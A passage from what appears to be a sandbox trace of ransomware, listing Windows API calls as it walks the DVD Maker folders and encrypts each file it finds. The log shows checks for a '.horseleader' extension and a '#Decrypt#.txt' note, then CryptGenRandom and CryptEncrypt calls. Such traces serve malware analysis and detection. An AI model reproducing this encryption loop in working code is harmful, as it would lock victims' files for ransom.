out: pbBuffer=0x32aed10) returned 1 [0251.717] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.718] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\postage_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.719] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6efd0609, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6efd0609, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ee26b73, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x160f, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Postage_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0251.719] lstrcmpiW (lpString1="Postage_SelectionSubpicture.png", lpString2="Windows") returned -1 [0251.719] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_SelectionSubpicture.png") returned 79 [0251.719] StrStrIW (lpFirst="Postage_SelectionSubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.719] lstrcmpW (lpString1="Postage_SelectionSubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.719] lstrcmpW (lpString1="Postage_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.719] lstrlenW (lpString=".testttjffg") returned 11 [0251.719] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_SelectionSubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.719] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.719] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.719] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\postage_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.720] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6efd0609, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6efd0609, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ee26b73, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc8e, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Postage_VideoInset.png", cAlternateFileName="")) returned 1 [0251.720] lstrcmpiW (lpString1="Postage_VideoInset.png", lpString2="Windows") returned -1 [0251.720] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_VideoInset.png") returned 70 [0251.720] StrStrIW (lpFirst="Postage_VideoInset.png", lpSrch=".horseleader") returned 0x0 [0251.720] lstrcmpW (lpString1="Postage_VideoInset.png", lpString2="#Decrypt#.txt") returned 1 [0251.720] lstrcmpW (lpString1="Postage_VideoInset.png", lpString2="_uninstalling_.png") returned 1 [0251.720] lstrlenW (lpString=".testttjffg") returned 11 [0251.720] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_VideoInset.png", lpSrch=".testttjffg") returned 0x0 [0251.720] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.720] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.720] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_VideoInset.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\postage_videoinset.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.720] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa11287e6, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa73ba87, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa119af33, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Push", cAlternateFileName="")) returned 1 [0251.720] lstrcmpiW (lpString1="Push", lpString2="Windows") returned -1 [0251.720] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push") returned 52 [0251.720] lstrcmpW (lpString1="Push", lpString2=".") returned 1 [0251.720] lstrcmpW (lpString1="Push", lpString2="..") returned 1 [0251.721] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0251.721] GetProcessHeap () returned 0x780000 [0251.721] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0251.721] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\*") returned 54 [0251.721] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa11287e6, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa73ba87, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa119af33, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0251.723] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0251.723] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\.") returned 54 [0251.723] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0251.723] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa11287e6, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa73ba87, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa119af33, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="..", cAlternateFileName="")) returned 1 [0251.723] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0251.723] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\..") returned 55 [0251.723] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0251.723] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0251.723] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f316407, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f316407, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ee26b73, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x11da, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="1047x576black.png", cAlternateFileName="")) returned 1 [0251.723] lstrcmpiW (lpString1="1047x576black.png", lpString2="Windows") returned -1 [0251.723] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\1047x576black.png") returned 70 [0251.723] StrStrIW (lpFirst="1047x576black.png", lpSrch=".horseleader") returned 0x0 [0251.724] lstrcmpW (lpString1="1047x576black.png", lpString2="#Decrypt#.txt") returned 1 [0251.724] lstrcmpW (lpString1="1047x576black.png", lpString2="_uninstalling_.png") returned 1 [0251.724] lstrlenW (lpString=".testttjffg") returned 11 [0251.724] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\1047x576black.png", lpSrch=".testttjffg") returned 0x0 [0251.724] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.724] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.724] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\1047x576black.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\1047x576black.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.724] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f316407, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f316407, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ee26b73, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x11da, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="1047_576black.png", cAlternateFileName="")) returned 1 [0251.724] lstrcmpiW (lpString1="1047_576black.png", lpString2="Windows") returned -1 [0251.724] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\1047_576black.png") returned 70 [0251.724] StrStrIW (lpFirst="1047_576black.png", lpSrch=".horseleader") returned 0x0 [0251.724] lstrcmpW (lpString1="1047_576black.png", lpString2="#Decrypt#.txt") returned 1 [0251.724] lstrcmpW (lpString1="1047_576black.png", lpString2="_uninstalling_.png") returned 1 [0251.724] lstrlenW (lpString=".testttjffg") returned 11 [0251.724] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\1047_576black.png", lpSrch=".testttjffg") returned 0x0 [0251.724] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.724] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.725] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\1047_576black.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\1047_576black.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.725] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f3626c1, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f3626c1, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ee26b73, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13e0, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationLeft_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0251.725] lstrcmpiW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="Windows") returned -1 [0251.725] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationLeft_ButtonGraphic.png") returned 85 [0251.725] StrStrIW (lpFirst="NavigationLeft_ButtonGraphic.png", lpSrch=".horseleader") returned 0x0 [0251.725] lstrcmpW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="#Decrypt#.txt") returned 1 [0251.725] lstrcmpW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0251.725] lstrlenW (lpString=".testttjffg") returned 11 [0251.725] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationLeft_ButtonGraphic.png", lpSrch=".testttjffg") returned 0x0 [0251.725] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.725] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.725] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationLeft_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\navigationleft_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.725] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f3626c1, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f3626c1, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ee26b73, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc3a, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationLeft_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0251.725] lstrcmpiW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="Windows") returned -1 [0251.726] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationLeft_SelectionSubpicture.png") returned 91 [0251.726] StrStrIW (lpFirst="NavigationLeft_SelectionSubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.726] lstrcmpW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.726] lstrcmpW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.726] lstrlenW (lpString=".testttjffg") returned 11 [0251.726] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationLeft_SelectionSubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.726] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.726] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.726] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationLeft_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\navigationleft_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.726] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f38881e, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f38881e, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ee26b73, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13a1, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationRight_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0251.726] lstrcmpiW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="Windows") returned -1 [0251.726] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationRight_ButtonGraphic.png") returned 86 [0251.726] StrStrIW (lpFirst="NavigationRight_ButtonGraphic.png", lpSrch=".horseleader") returned 0x0 [0251.726] lstrcmpW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="#Decrypt#.txt") returned 1 [0251.726] lstrcmpW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0251.726] lstrlenW (lpString=".testttjffg") returned 11 [0251.726] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationRight_ButtonGraphic.png", lpSrch=".testttjffg") returned 0x0 [0251.726] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.726] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.727] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationRight_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\navigationright_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.727] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f38881e, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f38881e, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ee26b73, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc2e, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationRight_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0251.727] lstrcmpiW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="Windows") returned -1 [0251.727] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationRight_SelectionSubpicture.png") returned 92 [0251.727] StrStrIW (lpFirst="NavigationRight_SelectionSubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.727] lstrcmpW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.727] lstrcmpW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.727] lstrlenW (lpString=".testttjffg") returned 11 [0251.727] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationRight_SelectionSubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.727] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.727] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.727] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationRight_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\navigationright_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.727] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f33c564, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f33c564, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ee26b73, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x135b, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationUp_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0251.727] lstrcmpiW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="Windows") returned -1 [0251.727] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationUp_ButtonGraphic.png") returned 83 [0251.727] StrStrIW (lpFirst="NavigationUp_ButtonGraphic.png", lpSrch=".horseleader") returned 0x0 [0251.728] lstrcmpW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="#Decrypt#.txt") returned 1 [0251.728] lstrcmpW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0251.728] lstrlenW (lpString=".testttjffg") returned 11 [0251.728] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationUp_ButtonGraphic.png", lpSrch=".testttjffg") returned 0x0 [0251.728] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.728] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.728] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationUp_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\navigationup_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.728] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f33c564, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f33c564, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ee26b73, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc09, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationUp_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0251.728] lstrcmpiW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="Windows") returned -1 [0251.728] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationUp_SelectionSubpicture.png") returned 89 [0251.728] StrStrIW (lpFirst="NavigationUp_SelectionSubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.728] lstrcmpW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.728] lstrcmpW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.728] lstrlenW (lpString=".testttjffg") returned 11 [0251.728] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationUp_SelectionSubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.728] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.729] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.729] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationUp_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\navigationup_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.729] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f2f02aa, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f2f02aa, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ee4ccd1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x5e02, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="push.png", cAlternateFileName="")) returned 1 [0251.729] lstrcmpiW (lpString1="push.png", lpString2="Windows") returned -1 [0251.729] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\push.png") returned 61 [0251.729] StrStrIW (lpFirst="push.png", lpSrch=".horseleader") returned 